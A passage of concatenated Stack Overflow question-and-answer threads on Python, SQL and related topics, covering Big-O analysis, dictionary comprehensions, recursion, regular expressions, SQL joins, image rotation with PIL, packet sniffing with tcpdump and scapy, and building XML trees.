i = 2 | x x x x _ _ _ _ |
i = 3 | x x x x x _ _ _ N
i = 4 | x x x x x x _ _ |
i = 5 | x x x x x x x _ |
i = 6 | x x x x x x x x _
|-----N + 1-----|
```
The area of the whole rectangle is ~ N \* N (actually N \* (N + 1), but it does not matter that much here), so we see that there are ~ N ^ 2 / 2 operations. And it's O(N^2). | Well, let's consider this. The size of the input is `n = len(s)`. For each character, you loop from 0 to index. So we can get the following
```
for i = 0 to n
for j = 0 to i + 1
1
```
Which can be reduced to
```
for i = 0 to n
(i + 1)(i + 2)
```
Which then gives us
```
for i = 0 to n
i^2 + 3i + 2
```
We can then split this up and sum each term; summing `3i + 2` over i gives `3n(n + 1)/2 + 2n`, and together with the `i^2` term the total is clearly not linear: it's O(n^2).
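Whichever way you do the algebra, the quadratic growth is easy to confirm empirically by counting the inner-loop iterations of the question's loop structure (a quick sketch; `count_inner_iterations` is an illustrative helper, not from the original code):

```python
def count_inner_iterations(n):
    # mirrors: for index in range(n): for j in range(0, index + 1): ...
    count = 0
    for index in range(n):
        for j in range(0, index + 1):
            count += 1
    return count

# the total is n*(n+1)/2, i.e. about n^2/2, so doubling n quadruples the work
assert count_inner_iterations(7) == 7 * 8 // 2
assert count_inner_iterations(100) == 100 * 101 // 2
```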
I also don't understand why you have the second for loop; you can check whether a string is a palindrome in linear time by comparing the first and last characters.
If you're wondering how: <http://rosettacode.org/wiki/Palindrome_detection#Python> | Python Script: How to tell if in O(N) or O(N^2) time? | [
"",
"python",
"performance",
"big-o",
"palindrome",
""
] |
Here is my code:
```
# library to extract cookies in a http message
cj = cookielib.CookieJar()
... do connect to httpserver etc
cdict = ((c.name,c.value) for c in cj)
```
The problem with this code is that cdict is a generator, but I want to simply create a dictionary. How can I change the last line to assign to a dictionary? | Use a dictionary comprehension. (Introduced in Python 2.7)
`cdict = {c.name:c.value for c in cj}`
For example,
```
>>> {i:i*2 for i in range(10)}
{0: 0, 1: 2, 2: 4, 3: 6, 4: 8, 5: 10, 6: 12, 7: 14, 8: 16, 9: 18}
```
Here is the [PEP](http://www.python.org/dev/peps/pep-0274/) which introduced Dictionary Comprehensions. It may be useful.
**If you are on something below Python 2.7**, build a list of key-value pairs and call `dict()` on them, something like this:
```
>>> keyValList = [(i, i*2) for i in range(10)]
>>> keyValList
[(0, 0), (1, 2), (2, 4), (3, 6), (4, 8), (5, 10), (6, 12), (7, 14), (8, 16), (9, 18)]
>>> dict(keyValList)
{0: 0, 1: 2, 2: 4, 3: 6, 4: 8, 5: 10, 6: 12, 7: 14, 8: 16, 9: 18}
```
**OR** just pass your generator to the [`dict()`](http://docs.python.org/2/library/functions.html#func-dict) constructor. Something like this:
```
>>> dict((i, i*2) for i in range(10))
{0: 0, 1: 2, 2: 4, 3: 6, 4: 8, 5: 10, 6: 12, 7: 14, 8: 16, 9: 18}
``` | You can use a [*dict comprehension*](http://www.python.org/dev/peps/pep-0274/):
```
cdict = {c.name: c.value for c in cj}
``` | Convert generator object to a dictionary | [
"",
"python",
""
] |
As a recursion practice exercise, I am writing a Python function that recursively identifies if the input list is sorted from least to greatest, real numbers only, and then returns a Boolean value.
My code is:
```
def det_sorted(listA):
if len(listA) == 1:
return(True)
else:
if listA[0] <= det_sorted(listA[1:]):
return(True)
elif listA[0] > det_sorted(listA[1:]):
return(False)
```
This function always returns 'False.' The general question: how do I iterate recursively through the list correctly? My specific question: what have I done wrong here? | You are close; you want to return the result of the recursive call:
```
else:
if listA[0] <= listA[1]:
        return det_sorted(listA[1:])
```
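Folding that fix into a complete function might look like this (a sketch; note the recursive call goes to `det_sorted` itself, not to the built-in `sorted`, which would always be truthy for a non-empty list):

```python
def det_sorted(listA):
    if len(listA) <= 1:  # an empty or single-element list counts as sorted
        return True
    return listA[0] <= listA[1] and det_sorted(listA[1:])

assert det_sorted([1, 2, 2, 3]) is True
assert det_sorted([3, 1, 2]) is False
assert det_sorted([5]) is True
```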
or you could combine both statements into the return (and get rid of the else)
```
return listA[0] <= listA[1] and det_sorted(listA[1:])
``` | @Joran Beasley's answer is correct, but here's another solution to the problem that should be a bit quicker:
```
def is_sorted(l, prev=None):
if l:
if prev is None: return is_sorted(l[1:], l[0])
        else: return l[0] >= prev and is_sorted(l[1:], l[0])
else:
return True
``` | Recursively Identifying Sorted Lists | [
"",
"python",
"list",
"sorting",
"recursion",
"python-3.x",
""
] |
I'm trying to find if a particular sentence pattern has an abbreviated word like R.E.M. or CEO. The abbreviated words I am looking for are words in capital letters punctuated with periods, like R.E.M., or in all caps.
```
#sentence pattern = 'What is/was a/an(optional) word(abbreviated or not) ?
sentence1 = 'What is a CEO'
sentence2 = 'What is a geisha?'
sentence3 = 'What is ``R.E.M.``?'
```
This is what I have but it's not returning anything at all. It doesn't recognise the pattern. I can't figure out what is wrong with the regex.
```
c5 = re.compile("^[w|W]hat (is|are|was|were|\'s)( a| an| the)*( \`\`)*( [A-Z\.]+\s)*( \'\')* \?$")
if c5.match(question):
return "True."
```
EDIT: I am looking to see if the sentence pattern above has an abbreviated word. | You've got a few issues. It's not really clear from your examples what sort of quoting might be expected, or if you want to match the ones that don't end in question marks. Your regex uses `*` (zero or any number of the previous) when I think you can use `?` (zero or one of the previous). You also will miss sentences with `What's` even though I think you want those, because you're looking for `What 's` instead.
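For reference, the abbreviation test on its own can be isolated from the sentence pattern (a sketch; this pattern is illustrative, not the one from the question):

```python
import re

# dotted capitals (R.E.M.) or a run of two or more capital letters (CEO)
abbrev = re.compile(r'(?:[A-Z]\.){2,}|\b[A-Z]{2,}\b')

assert abbrev.search('What is a CEO') is not None
assert abbrev.search('What is a geisha?') is None
assert abbrev.search('What is ``R.E.M.``?') is not None
```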
Here's a possible solution:
```
import re
sentence1 = "What is a CEO"
sentence2 = "What is a geisha?"
sentence3 = "What is ``R.E.M.``?"
sentence4 = "What's SCUBA?"
c1 = re.compile(r"^[wW]hat(?: is| are| was| were|\'s)(?: a| an| the)? [`']{0,2}((?:[A-Z]\.)+|[A-Z]+)[`']{0,2} ?\??")
def test(question, regex):
if regex.match(question):
return "Matched!"
else:
return "Nope!"
test(sentence1,c1)
> "Matched!"
test(sentence2,c1)
> "Nope!"
test(sentence3,c1)
> "Matched!"
test(sentence4,c1)
> "Matched!"
```
But it could probably be tweaked more depending on whether you expect the abbreviation to be double-quoted, for example. | The position of the spaces before and after your abbreviation check are off.
You might also want to check your quote handling. Perhaps it's just an artefact of posting your code here, but there seems to be some confusion with your ' and `'s. Try
```
['`"]*
```
instead for both. | Regex to match certain sentence pattern with Python | [
"",
"python",
"regex",
""
] |
I am using Python to go through a file and remove any comments. A comment is defined as a hash and anything to the right of it *as long as the hash isn't inside double quotes*. I currently have a solution, but it seems sub-optimal:
```
filelines = []
r = re.compile('(".*?")')
for line in f:
m = r.split(line)
nline = ''
for token in m:
if token.find('#') != -1 and token[0] != '"':
nline += token[:token.find('#')]
break
else:
nline += token
filelines.append(nline)
```
Is there a way to find the first hash not within quotes without for loops (i.e. through regular expressions?)
Examples:
```
' "Phone #":"555-1234" ' -> ' "Phone #":"555-1234" '
' "Phone "#:"555-1234" ' -> ' "Phone "'
'#"Phone #":"555-1234" ' -> ''
' "Phone #":"555-1234" #Comment' -> ' "Phone #":"555-1234" '
```
---
Edit: Here is a pure regex solution created by user2357112. I tested it, and it works great:
```
filelines = []
r = re.compile('(?:"[^"]*"|[^"#])*(#)')
for line in f:
m = r.match(line)
    if m is not None:
filelines.append(line[:m.start(1)])
else:
filelines.append(line)
```
See his reply for more details on how this regex works.
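Here is a quick standalone check of that regex against the examples above (a sketch, separate from the file-processing loop):

```python
import re

r = re.compile(r'(?:"[^"]*"|[^"#])*(#)')

def strip_comment(line):
    # keep everything before the first hash that sits outside double quotes
    m = r.match(line)
    return line[:m.start(1)] if m is not None else line

assert strip_comment(' "Phone #":"555-1234" ') == ' "Phone #":"555-1234" '
assert strip_comment(' "Phone "#:"555-1234" ') == ' "Phone "'
assert strip_comment('#"Phone #":"555-1234" ') == ''
assert strip_comment(' "Phone #":"555-1234" #Comment') == ' "Phone #":"555-1234" '
```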
Edit2: Here's a version of user2357112's code that I modified to account for escape characters (\"). This code also eliminates the 'if' by including a check for end of string ($):
```
filelines = []
r = re.compile(r'(?:"(?:[^"\\]|\\.)*"|[^"#])*(#|$)')
for line in f:
m = r.match(line)
filelines.append(line[:m.start(1)])
``` | ```
r'''(?: # Non-capturing group
"[^"]*" # A quote, followed by not-quotes, followed by a quote
| # or
[^"#] # not a quote or a hash
) # end group
* # Match quoted strings and not-quote-not-hash characters until...
(#) # the comment begins!
'''
```
This is a verbose regex, designed to operate on a single line, so make sure to use the `re.VERBOSE` flag and feed it one line at a time. It'll capture the first unquoted hash as group 1 if there is one, so you can use `match.start(1)` to get the index. It doesn't handle backslash escapes, if you want to be able to put a backslash-escaped quote in a string. This is untested. | You can remove comments using this script:
```
import re
print re.sub(r'(?s)("[^"\\]*(?:\\.[^"\\]*)*")|#[^\n]*', lambda m: m.group(1) or '', '"Phone #"#:"555-1234"')
```
The idea is to first capture the parts enclosed in double quotes and replace them by themselves before searching for a hash:
```
(?s) # the dot matches newlines too
( # open the capture group 1
" # "
[^"\\]* # all characters except a quote or a backslash
# zero or more times
(?: # open a non-capturing group
\\. # a backslash and any character
[^"\\]* #
)* # repeat zero or more times
" # "
) # close the capture group 1
| # OR
        #[^\n]*      # a hash and zero or more characters that are not a newline.
``` | Removing hash comments that are not inside quotes | [
"",
"python",
"regex",
"comments",
"quotes",
"strip",
""
] |
Looking at this Django code from the Django Book:
```
from django.http import Http404, HttpResponse
import datetime
def hours_ahead(request, offset):
try:
offset = int(offset)
except ValueError:
raise Http404()
dt = datetime.datetime.now() + datetime.timedelta(hours=offset)
html = "<html><body>In %s hour(s), it will be %s.</body></html>" % (offset, dt)
return HttpResponse(html)
```
After the try, it converts offset into an integer, right? And in the line 'datetime.timedelta(hours=offset)', offset is used as an integer, but in the line
'html = "In %s hour(s), it will be %s." % (offset, dt)'
offset is a %s which is a string, right? Or am I miss understanding? I thought %s only can be a string, not an integer? | `%s` calls the `str()` method on its corresponding argument... (similar to `%r` calls `repr()`) - so either of those can be used for *any* object... Unlike `%d` (`%i` is the same) and `%f` for instance which will require appropriate types. | If `offset` is an **integer** (in this particular case, it's not true for any object type), then you can use any of `%s`, `%d`, `%r` and you'll get the same result.
`%d` formats an integer number for display, `%s` calls `str()` on an argument, `%r` calls `repr()`:
```
>>> n = 5
>>> str(n)
'5'
>>> repr(n)
'5'
```
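To make the difference concrete (a quick sketch):

```python
# %s accepts any object because it goes through str()
assert "%s" % 5 == "5"
assert "%s" % [1, 2] == "[1, 2]"

# %d insists on a number: floats are truncated, non-numbers raise TypeError
assert "%d" % 3.7 == "3"
try:
    "%d" % "five"
except TypeError:
    pass
else:
    raise AssertionError("%d should reject a plain string")
```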
Also see [documentation](http://docs.python.org/2/library/stdtypes.html#string-formatting). | can %s be an integer? *Python code* | [
"",
"python",
""
] |
I have three tables I need to join in order to tell what documents a product needs. Not all documents are needed on each product.
There is a Document table, a Product table, and a DocTracking table that tracks the documents associated with products
```
Product Table
ProdID ProdName
1 Ball
2 Wheel
```
```
DocTracking Table
ProdID DocID
1 1
1 2
2 2
```
I want the join to look like this:
```
ProdID ProdName Needs Word Doc? Needs Excel Doc?
1 Ball Yes Yes
2 Wheel No Yes
```
Any help would be appreciated, if I need to make this into a Stored Procedure, that is fine. | If you have only those documents and they are fixed you can use this query:
```
SELECT ProdID, ProdName,
[Needs Word Doc] = CASE WHEN EXISTS(
SELECT 1 FROM Document d INNER JOIN DocTracking dt ON d.DocID=dt.DocID
WHERE dt.ProdID = p.ProdID AND d.[Doc Name] = 'Word Document'
) THEN 'Yes' ELSE 'No' END,
[Needs Excel Doc] = CASE WHEN EXISTS(
SELECT 1 FROM Document d INNER JOIN DocTracking dt ON d.DocID=dt.DocID
    WHERE dt.ProdID = p.ProdID AND d.[Doc Name] = 'Excel Spreadsheet'
) THEN 'Yes' ELSE 'No' END
FROM dbo.Product p
```
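The logic of this query is easy to sanity-check from Python with SQLite (a sketch; names are simplified, e.g. `DocName` instead of `[Doc Name]`, and standard `AS` aliases replace the T-SQL `alias = expression` form):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Product (ProdID INTEGER, ProdName TEXT);
    CREATE TABLE Document (DocID INTEGER, DocName TEXT);
    CREATE TABLE DocTracking (ProdID INTEGER, DocID INTEGER);
    INSERT INTO Product VALUES (1, 'Ball'), (2, 'Wheel');
    INSERT INTO Document VALUES (1, 'Word Document'), (2, 'Excel Spreadsheet');
    INSERT INTO DocTracking VALUES (1, 1), (1, 2), (2, 2);
""")
rows = conn.execute("""
    SELECT p.ProdID, p.ProdName,
           CASE WHEN EXISTS(SELECT 1 FROM Document d
                            JOIN DocTracking dt ON d.DocID = dt.DocID
                            WHERE dt.ProdID = p.ProdID AND d.DocName = 'Word Document')
                THEN 'Yes' ELSE 'No' END,
           CASE WHEN EXISTS(SELECT 1 FROM Document d
                            JOIN DocTracking dt ON d.DocID = dt.DocID
                            WHERE dt.ProdID = p.ProdID AND d.DocName = 'Excel Spreadsheet')
                THEN 'Yes' ELSE 'No' END
    FROM Product p ORDER BY p.ProdID
""").fetchall()
assert rows == [(1, 'Ball', 'Yes', 'Yes'), (2, 'Wheel', 'No', 'Yes')]
```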
Of course you could also use the `DocID`, then the query doesn't depend on the name. | ```
select P.ProdID, P.ProdName,
case
        when DW.DocID is null then 'No'
        else 'Yes'
end as NeedsWordDoc,
case
        when DE.DocID is null then 'No'
        else 'Yes'
end as NeedsExcelDoc
from Product P
left join DocTracking DTW on DTW.ProdId = P.ProdId
left join Document DW on DW.DocID = DTW.DocID
and DW.Name = 'Word Document'
left join DocTracking DTE on DTE.ProdId = P.ProdId
left join Document DE on DE.DocID = DTE.DocID
and DE.Name = 'Excel Spreadsheet'
``` | SQL Group By Join | [
"",
"sql",
"sql-server",
"join",
"group-by",
""
] |
Is there a way to do
```
tcpdump -i lo -A
```
and have it print all URLs and any connections made?
I have done:
```
sudo tcpdump -i lo -A | grep Host:
```
which works great. But I was wondering if there are options to do the same in tcpdump
Finally, is there a way to do this in python without using a sys command or Popen/subprocess | you can use scapy the sniff function and use regex or grep
```
from scapy.all import sniff, wrpcap
tcpdump = sniff(count=5,filter="host 64.233.167.99",prn=lambda x:x.summary())
print tcpdump
```
Change the filter to your filter text :)
or maybe you want to save the traffic and see it in wireshark
```
wrpcap("temp.cap",pkts)
``` | tcpdump cannot filter based upon the content of the packets (no deep packet inspection), as it only uses pcap filters.
You could improve your performance by only dumping packets for `incoming TCP connections to your HTTP port`.
```
tcpdump -i lo -A tcp port 80
```
TCPDUMP python: use [Pcapy](http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Pcapy)
Another option is to use [tshark](https://serverfault.com/questions/84750/monitoring-http-traffic-using-tcpdump) | tcpdump to only print urls | [
"",
"python",
"tcpdump",
""
] |
I have the following table `routes` :
```
from | to
---------
abc | cde
cde | abc
klm | xyz
xyz | klm
def | ghi
ghi | mno
mno | ghi
ghi | def
```
I then extract each unique pair of routes (in my project abc -> cde = cde -> abc) :
```
SELECT DISTINCT LEAST(`from`,`to`) AS point_a, GREATEST(`from`,`to`) AS point_b FROM routes
```
And I end up with the following result :
```
point_a | point_b
-----------------
abc | cde
klm | xyz
def | ghi
ghi | mno
```
Separately I have the following table `location`
```
code | description
------------------
abc | home
cde | beach
ghi | work
xyz | club
klm | friend
...
```
I want to join this table to the result above so that I end up with the following :
```
point_a | point_b | a_description | b_description
-------------------------------------------------
abc | cde | home | beach
klm | xyz | friend | club
...
```
What query would do all this at once ?
I've tried selecting unique pairs from `routes` and then joining the table `location`, or joining the table `location` first and then sorting out the duplicates afterwards; I either get errors or the duplicates show up... | You can use `LEFT JOIN` for that:
```
SELECT r.point_a, r.point_b
, l1.description as a_description, l2.description as b_description
FROM
(SELECT DISTINCT LEAST(`from`,`to`) AS point_a
,GREATEST(`from`,`to`) AS point_B
FROM routes) AS r
LEFT JOIN location l1
ON r.point_a = l1.code
LEFT JOIN location l2
ON r.point_b = l2.code;
```
Or `INNER JOIN` if you do not want to get null values for either point
```
SELECT r.point_a, r.point_b
, l1.description as a_description, l2.description as b_description
FROM
(SELECT DISTINCT LEAST(`from`,`to`) AS point_a
,GREATEST(`from`,`to`) AS point_B
FROM routes) AS r
INNER JOIN location l1
ON r.point_a = l1.code
INNER JOIN location l2
ON r.point_b = l2.code;
```
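Here is the same approach reproduced with SQLite from Python (a sketch: SQLite's two-argument `MIN()`/`MAX()` stand in for MySQL's `LEAST()`/`GREATEST()`, and the `office`/`gym` descriptions are made-up sample data for the location rows elided in the question):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE routes ("from" TEXT, "to" TEXT);
    CREATE TABLE location (code TEXT, description TEXT);
    INSERT INTO routes VALUES ('abc','cde'),('cde','abc'),('klm','xyz'),
                              ('xyz','klm'),('def','ghi'),('ghi','mno'),
                              ('mno','ghi'),('ghi','def');
    INSERT INTO location VALUES ('abc','home'),('cde','beach'),('ghi','work'),
                                ('xyz','club'),('klm','friend'),
                                ('def','office'),('mno','gym');
""")
rows = conn.execute("""
    SELECT r.point_a, r.point_b, l1.description, l2.description
    FROM (SELECT DISTINCT MIN("from","to") AS point_a,
                          MAX("from","to") AS point_b
          FROM routes) AS r
    JOIN location l1 ON r.point_a = l1.code
    JOIN location l2 ON r.point_b = l2.code
    ORDER BY r.point_a, r.point_b
""").fetchall()
assert rows == [('abc', 'cde', 'home', 'beach'), ('def', 'ghi', 'office', 'work'),
                ('ghi', 'mno', 'work', 'gym'), ('klm', 'xyz', 'friend', 'club')]
```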
### See [this SQLFiddle](http://sqlfiddle.com/#!2/99a47/1) | One approach:
```
SELECT LEAST(r.from,r.to) AS point_a,
GREATEST(r.from,r.to) AS point_B,
MAX(CASE l.code WHEN LEAST(r.from,r.to) THEN l.description END)
a_description,
MAX(CASE l.code WHEN GREATEST(r.from,r.to) THEN l.description END)
b_description
FROM routes r
JOIN location l ON l.code IN (r.from,r.to)
GROUP BY LEAST(r.from,r.to), GREATEST(r.from,r.to)
```
SQLFiddle [here](http://sqlfiddle.com/#!2/99a47/3). | Query to join a table on another query | [
"",
"mysql",
"sql",
"duplicates",
""
] |
I need to round a number up to the next multiple of 10 in a query.
I tried to use round(n,-1), but that rounds to the nearest 10; I need the next (higher) multiple of 10.
Please help me.
```
select round(5834.6,-1) from dual
```
gives 5830 but i need 5840 | ```
select ceil(5834.6/10)*10 from dual
``` | Then add "5":
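The ceiling trick is easy to check outside the database (Python sketch; note that a value already on a multiple of 10 stays put, which matches `CEIL` semantics):

```python
import math

def next_ten(n):
    # round up to the next multiple of 10 (exact multiples are left alone)
    return math.ceil(n / 10) * 10

assert next_ten(5834.6) == 5840
assert next_ten(5831) == 5840
assert next_ten(5830) == 5830
```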
```
select round(5834.6 + 5,-1) from dual
``` | how to round off to next 10 in oracle? | [
"",
"sql",
"plsql",
"oracle11g",
""
] |
Lets say I have a table like this:
```
Id*|value
```
For each `Id` I want to count how many times the corresponding `value` exist. Like with this sample data:
```
1, a
2, b
3, a
4, b
5, c
6, a
```
I want:
```
1, a, 3
2, b, 2
3, a, 3
4, b, 2
5, c, 1
6, a, 3
```
This is what I have right now and I believe it is working, but it is dead slow:
```
SELECT t1.Id, t1.value, COUNT(t2.value) FROM `table` AS t1
LEFT JOIN `table` AS t2 ON (t1.value = t2.value)
GROUP by t1.Id
```
My table contains hounded of thousands rows. Any suggestion on how to improve this performance vice? | Try this
```
SELECT t1.Id, t1.value, t2.cnt FROM Table1 AS t1
INNER JOIN
(
SELECT value, COUNT(value) as cnt
FROM Table1 GROUP BY value
) AS t2 ON (t1.value = t2.value)
ORDER BY t1.Id
```
OR
```
SELECT t1.id,t1.value,COUNT(t2.id) AS cnt FROM Table1 AS t1
INNER JOIN Table1 AS t2
ON t1.value = t2.value
GROUP BY t1.id,t1.value
ORDER BY t1.id
``` | Left join it with GROUP BY query running on itself:
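The derived-table approach can be reproduced on the question's sample data with SQLite (sketch):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE t (Id INTEGER, value TEXT);
    INSERT INTO t VALUES (1,'a'),(2,'b'),(3,'a'),(4,'b'),(5,'c'),(6,'a');
""")
rows = conn.execute("""
    SELECT t1.Id, t1.value, t2.cnt
    FROM t AS t1
    JOIN (SELECT value, COUNT(value) AS cnt FROM t GROUP BY value) AS t2
      ON t1.value = t2.value
    ORDER BY t1.Id
""").fetchall()
assert rows == [(1, 'a', 3), (2, 'b', 2), (3, 'a', 3),
                (4, 'b', 2), (5, 'c', 1), (6, 'a', 3)]
```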
SQL Fiddle here - <http://sqlfiddle.com/#!2/5b8f5/18>
```
SELECT
tbl.id, tbl.value, cnts.counts FROM tbl
LEFT JOIN (
SELECT value, COUNT(value) AS counts FROM tbl GROUP BY value
) AS cnts ON (tbl.value = cnts.value)
``` | Count repeated values - help my mysql query is dead slow | [
"",
"mysql",
"sql",
"performance",
""
] |
Basically I'm trying to make it possible to rotate images via a user interface; however, I've noticed that the image quality severely decreases upon each rotation. Does anyone know how to fix that? Also, when the image is rotated it crops off parts of the image each time.
here are some pictures
of before and after:
<https://i.stack.imgur.com/M5WVJ.jpg>
And here's the code:
```
def onRotate(self):
tanTheta = float(hh)/float(ww)
theta = math.atan(tanTheta) * 57.2957795 # convert to degrees
if theta > 0:
angle = (90 - theta) * -1
clockwise = True
elif theta < 0:
angle = (270 - theta) * -1
clockwise = False
else:
tkMessageBox('Angle not okay', 'Try again!')
rotated_small = photo_small.rotate(angle)
rotated_small.save('small_rotate.jpg')
self.load_imgfile('small_rotate.jpg')
``` | ```
rotated_small = photo_small.rotate(angle, resample=Image.BICUBIC, expand=True)
```
This tells it to use the highest quality interpolation algorithm that it has available, and to expand the image to encompass the full rotated size instead of cropping. The documentation does not say what color the background will be filled with. | An image is a grid of pixels. If you rotate it (and angle isn't a multiple of 90) the rotated grid must be rematched to a new non-rotated grid to display the image. Some loss can't be avoided in this process.
Only option would be to keep the unrotated image somewhere and sum up the angles of multiple rotations and always build the rotated image from the initial unrotated one. | How to preserve Image Quality when rotating with PIL | [
"",
"python",
"python-imaging-library",
""
] |
I have 3 tables..
`House1` `House2` `results`
```
house1
ID, Name, Monday, Tuesday
1 john 1 1
2 jack 1 0
```
and
```
House2
ID, Name, Monday, Tuesday
3 Dan 0 0
1 John 1 0
```
and I want to fill the `results` table, something like this:
```
results
ID, Name, Total
1 john 3
2 jack 1
3 dan 0
```
I'm using IIF() to count the days, but it made duplicate rows.
I'm using something similar to:
```
INSERT INTO results (ID, name, total)
SELECT ID, name, IIf([house1.monday]>0,1,0)+
IIf([house2.monday]>0,1,0)+
IIf([house1.tuesday]>0,1,0)+
IIF([house2.tuesday]>0,1,0) as TOTAL
FROM house1,house2
WHERE House1.ID = House2.ID
```
That clearly doesn't work, because it only inserts the data for `john`. | You recognize the problem with your query. The inner join only keeps matching rows.
You can keep all rows by using `union all` instead. The following calculates the `total` for each table and then uses `aggregation` to sum them:
```
INSERT INTO results(ID, name, total)
SELECT ID, name, SUM(Total) as TOTAL
FROM ((select h1.id, IIf([h1.monday]>0,1,0) + IIf([h1.tuesday]>0,1,0) as Total
from house1 h1
) union all
(select h2.id, IIf([h2.monday]>0,1,0) + IIf([h2.tuesday]>0,1,0) as Total
from house2 h2
)
) h
group by id, name;
```
EDIT
You changed the question in your comment. However, you would just do the same thing, defining the columns that you need in the subquery:
```
INSERT INTO results(ID, name, totalMonday, totalTuesday, total)
SELECT ID, name, SUM(Monday), SUM(Tuesday), SUM(Monday)+Sum(Tuesday) as TOTAL
FROM ((select h1.id, IIf([h1.monday]>0,1,0) as Monday, IIf([h1.tuesday]>0,1,0) as Tuesday
from house1 h1
) union all
(select h2.id, IIf([h2.monday]>0,1,0) as Monday, IIf([h2.tuesday]>0,1,0) as Tuesday
from house2 h2
)
) h
group by id, name;
``` | What about something like
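The UNION ALL idea can be checked from Python with SQLite (a sketch: `(Monday > 0)` stands in for Access's `IIf(...)>0` test, and the sample names are normalised to one casing so `john`/`John` group together):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE house1 (ID INTEGER, Name TEXT, Monday INTEGER, Tuesday INTEGER);
    CREATE TABLE house2 (ID INTEGER, Name TEXT, Monday INTEGER, Tuesday INTEGER);
    INSERT INTO house1 VALUES (1,'john',1,1),(2,'jack',1,0);
    INSERT INTO house2 VALUES (3,'dan',0,0),(1,'john',1,0);
""")
rows = conn.execute("""
    SELECT ID, Name, SUM(Total) AS Total
    FROM (SELECT ID, Name, (Monday > 0) + (Tuesday > 0) AS Total FROM house1
          UNION ALL
          SELECT ID, Name, (Monday > 0) + (Tuesday > 0) AS Total FROM house2)
    GROUP BY ID, Name
    ORDER BY ID
""").fetchall()
assert rows == [(1, 'john', 3), (2, 'jack', 1), (3, 'dan', 0)]
```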
```
SELECT ID, Name, SUM(Monday)+SUM(Tuesday) as Total
FROM
(
SELECT ID, Name, Monday, Tuesday
FROM House1
Union ALL
SELECT ID, Name, Monday, Tuesday
FROM House2
) a
Group BY a.ID, a.Name
``` | Sum data in two tables and insert it in another one without duplucate ID | [
"",
"sql",
"database",
"ms-access",
""
] |
I have a txt file containing more than 100 thousand lines, and for each line I want to create an XML tree. BUT all lines share the same root.
Here is the txt file:
```
LIBRARY:
1,1,1,1,the
1,2,1,1,world
2,1,1,2,we
2,5,2,1,have
7,3,1,1,food
```
The desired output:
```
<LIBRARY>
<BOOK ID ="1">
<CHAPTER ID ="1">
<SENT ID ="1">
<WORD ID ="1">the</WORD>
</SENT>
</CHAPTER>
</BOOK>
<BOOK ID ="1">
<CHAPTER ID ="2">
<SENT ID ="1">
<WORD ID ="1">world</WORD>
</SENT>
</CHAPTER>
</BOOK>
<BOOK ID ="2">
<CHAPTER ID ="1">
<SENT ID ="1">
<WORD ID ="2">we</WORD>
</SENT>
</CHAPTER>
</BOOK>
<BOOK ID ="2">
<CHAPTER ID ="5">
<SENT ID ="2">
<WORD ID ="1">have</WORD>
</SENT>
</CHAPTER>
</BOOK>
<BOOK ID ="7">
<CHAPTER ID ="3">
<SENT ID ="1">
<WORD ID ="1">food</WORD>
</SENT>
</CHAPTER>
</BOOK>
</LIBRARY>
```
I use ElementTree to convert the txt file to an XML file; this is the code I run:
```
def expantree():
lines = txtfile.readlines()
for line in lines:
split_line = line.split(',')
BOOK.set( 'ID ', split_line[0])
CHAPTER.set( 'ID ', split_line[1])
SENTENCE.set( 'ID ', split_line[2])
WORD.set( 'ID ', split_line[3])
WORD.text = split_line[4]
tree = ET.ElementTree(Root)
tree.write(xmlfile)
```
Okay, the code runs, but I didn't get the desired output; I got the following:
```
<LIBRARY>
<BOOK ID ="1">
<CHAPTER ID ="1">
<SENT ID ="1">
<WORD ID ="1">the</WORD>
</SENT>
</CHAPTER>
</BOOK>
</LIBRARY>
<LIBRARY>
<BOOK ID ="1">
<CHAPTER ID ="2">
<SENT ID ="1">
<WORD ID ="1">world</WORD>
</SENT>
</CHAPTER>
</BOOK>
</LIBRARY>
<LIBRARY>
<BOOK ID ="2">
<CHAPTER ID ="1">
<SENT ID ="1">
<WORD ID ="2">we</WORD>
</SENT>
</CHAPTER>
</BOOK>
</LIBRARY>
<LIBRARY>
<BOOK ID ="2">
<CHAPTER ID ="5">
<SENT ID ="2">
<WORD ID ="1">have</WORD>
</SENT>
</CHAPTER>
</BOOK>
</LIBRARY>
<LIBRARY>
<BOOK ID ="7">
<CHAPTER ID ="3">
<SENT ID ="1">
<WORD ID ="1">food</WORD>
</SENT>
</CHAPTER>
</BOOK>
</LIBRARY>
```
How do I unify the tree root, so that instead of getting many root tags I get one root tag? | One method would be to create the full tree and print it. I used the following code:
```
from lxml import etree as ET
def create_library(lines):
library = ET.Element('LIBRARY')
for line in lines:
        split_line = line.strip().split(',')
        if len(split_line) == 5:  # skip the 'LIBRARY:' header and malformed lines
            library.append(create_book(split_line))
return library
def create_book(split_line):
book = ET.Element('BOOK',ID=split_line[0])
book.append(create_chapter(split_line))
return book
def create_chapter(split_line):
chapter = ET.Element('CHAPTER',ID=split_line[1])
chapter.append(create_sentence(split_line))
return chapter
def create_sentence(split_line):
sentence = ET.Element('SENT',ID=split_line[2])
sentence.append(create_word(split_line))
return sentence
def create_word(split_line):
word = ET.Element('WORD',ID=split_line[3])
word.text = split_line[4]
return word
```
Then your code to create the file would look like:
```
def expantree():
lines = txtfile.readlines()
library = create_library(lines)
    ET.ElementTree(library).write(xmlfile)
```
If you don't want to load the entire tree in memory (you mentioned there are more than 100 thousand lines), you can manually write the opening `<LIBRARY>` tag, write each book one at a time, then add the closing `</LIBRARY>` tag. In this case your code would look like:
```
def expantree():
lines = txtfile.readlines()
f = open(xmlfile,'wb')
f.write('<LIBRARY>')
for line in lines:
        split_line = line.strip().split(',')
        if len(split_line) == 5:  # skip the 'LIBRARY:' header and malformed lines
            book = create_book(split_line)
            f.write(ET.tostring(book))
f.write('</LIBRARY>')
f.close()
```
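If lxml is not available, the same structure can also be built with the standard library's `xml.etree.ElementTree` (a sketch using the sample lines inline; the length check skips the `LIBRARY:` header):

```python
import xml.etree.ElementTree as ET

lines = ["LIBRARY:", "1,1,1,1,the", "1,2,1,1,world", "2,1,1,2,we",
         "2,5,2,1,have", "7,3,1,1,food"]

library = ET.Element("LIBRARY")
for line in lines:
    parts = line.strip().split(",")
    if len(parts) != 5:          # skip the header (and any blank lines)
        continue
    book = ET.SubElement(library, "BOOK", ID=parts[0])
    chapter = ET.SubElement(book, "CHAPTER", ID=parts[1])
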